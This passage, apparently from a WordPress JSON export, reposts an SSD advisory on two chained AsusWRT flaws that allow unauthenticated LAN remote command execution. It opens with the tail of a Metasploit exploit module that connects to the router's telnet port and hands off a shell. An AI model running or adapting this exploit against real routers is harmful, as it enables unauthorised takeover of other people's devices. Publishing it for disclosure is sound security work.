id=\"crayon-5a66636295042778926259-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">begin<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-114\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8216;Msf&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;MsfExploit&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create_tcp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PeerHost&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rhost<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PeerPort&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">telnet_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Context&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Timeout&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Success, shell incoming!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handler<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-e\">rescue <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">AddressInUse<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Errno<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">ETIMEDOUT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">HostUnreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">ConnectionTimeout<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">ConnectionRefused<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Timeout<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Error<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">EOFError<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">e<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sock<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-122\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-123\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_bad<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;#{peer} - Well that didn't work... try again?&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-125\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-126\"><span class=\"crayon-st\">end<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3589\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:50:36 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. 
AsusWRT is &#8220;THE POWERFUL USER-FRIENDLY INTERFACE &#8211; The enhanced ASUSWRT graphical user interface gives you easy access to the 30-second, 3-step web-based installation process. It\u2019s also &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3589\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Hack2Win &#8211; Asus Unauthenticated LAN Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[16780,12603,11851,10757,12136,17050],"class_list":["post-11196","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-configuration-reset","tag-hack2win","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action","tag-unauthorized-access"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11196"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11196\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11196"},{"taxonomy":"post_tag","embedda
ble":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}